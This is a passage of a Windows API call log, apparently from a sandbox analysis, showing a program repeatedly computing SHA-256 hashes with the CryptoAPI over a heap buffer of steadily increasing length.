	[0253.149] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5198, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5198, pdwDataLen=0x128c3c) returned 1
	[0253.149] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.149] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.149] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.150] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.150] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0253.150] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c51c0
	[0253.150] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c51c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c51c0, pdwDataLen=0x128c3c) returned 1
	[0253.150] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.150] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.150] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.150] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.150] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0253.150] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c51e8
	[0253.150] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c51e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c51e8, pdwDataLen=0x128c3c) returned 1
	[0253.150] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.150] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.150] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.151] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.151] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0253.151] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5210
	[0253.151] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5210, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5210, pdwDataLen=0x128c3c) returned 1
	[0253.151] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.151] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.151] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.151] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.151] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0253.151] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5238
	[0253.151] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5238, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5238, pdwDataLen=0x128c3c) returned 1
	[0253.151] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.151] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.151] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.152] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.152] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0253.152] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5260
	[0253.152] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5260, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5260, pdwDataLen=0x128c3c) returned 1
	[0253.152] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.152] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.152] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.152] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.152] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0253.152] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5288
	[0253.152] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5288, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5288, pdwDataLen=0x128c3c) returned 1
	[0253.152] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.152] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.152] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.153] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.153] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0253.153] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.153] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c52b0
	[0253.153] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c52b0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c52b0, pdwDataLen=0x128c3c) returned 1
	[0253.153] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.153] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.153] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.153] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.153] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0253.153] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.153] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c52d8
	[0253.153] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c52d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c52d8, pdwDataLen=0x128c3c) returned 1
	[0253.153] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.153] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.153] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.154] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.154] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0253.154] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5300
	[0253.154] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5300, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5300, pdwDataLen=0x128c3c) returned 1
	[0253.154] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.154] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.154] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x276ecb0) returned 1
	[0253.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x276ecb0
	[0253.154] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.154] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.154] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0253.154] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5328
	[0253.154] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5328, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5328, pdwDataLen=0x128c3c) returned 1
	[0253.154] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.154] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.154] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.155] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.155] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0253.155] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.155] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5350
	[0253.155] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5350, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5350, pdwDataLen=0x128c3c) returned 1
	[0253.155] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.155] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.155] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.155] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.155] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0253.155] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.155] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5378
	[0253.155] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5378, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5378, pdwDataLen=0x128c3c) returned 1
	[0253.155] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.155] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.155] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.156] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.156] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0253.156] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c53a0
	[0253.156] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c53a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c53a0, pdwDataLen=0x128c3c) returned 1
	[0253.156] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.156] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.156] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.156] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.156] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0253.156] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c53c8
	[0253.156] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c53c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c53c8, pdwDataLen=0x128c3c) returned 1
	[0253.156] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.156] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.156] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.157] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.157] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0253.157] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c53f0
	[0253.157] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c53f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c53f0, pdwDataLen=0x128c3c) returned 1
	[0253.157] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.157] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.157] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.157] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.157] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0253.157] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.204] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5418
	[0253.204] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5418, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5418, pdwDataLen=0x128c3c) returned 1
	[0253.204] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.204] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.204] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.205] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.205] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0253.205] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.205] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5440
	[0253.205] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5440, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5440, pdwDataLen=0x128c3c) returned 1
	[0253.205] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.205] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.205] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.205] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.205] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0253.205] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.205] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5468
	[0253.205] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5468, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5468, pdwDataLen=0x128c3c) returned 1
	[0253.205] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.205] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.205] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.206] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.206] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0253.206] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.206] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5490
	[0253.206] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5490, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5490, pdwDataLen=0x128c3c) returned 1
	[0253.206] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.206] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.206] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.206] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.206] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0253.206] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.206] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c54b8
	[0253.206] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c54b8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c54b8, pdwDataLen=0x128c3c) returned 1
	[0253.206] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.206] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.206] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.207] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.207] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0253.207] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.207] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c54e0
	[0253.207] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c54e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c54e0, pdwDataLen=0x128c3c) returned 1
	[0253.207] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.207] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.207] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.207] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.207] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0253.207] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.207] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5508
	[0253.207] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5508, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5508, pdwDataLen=0x128c3c) returned 1
	[0253.207] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.207] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.207] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.208] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.208] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0253.208] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.208] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5530
	[0253.208] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5530, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5530, pdwDataLen=0x128c3c) returned 1
	[0253.208] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.208] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.208] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.208] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.208] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0253.208] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.208] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5558
	[0253.208] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5558, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5558, pdwDataLen=0x128c3c) returned 1
	[0253.208] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.208] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.208] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.209] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.209] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0253.209] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
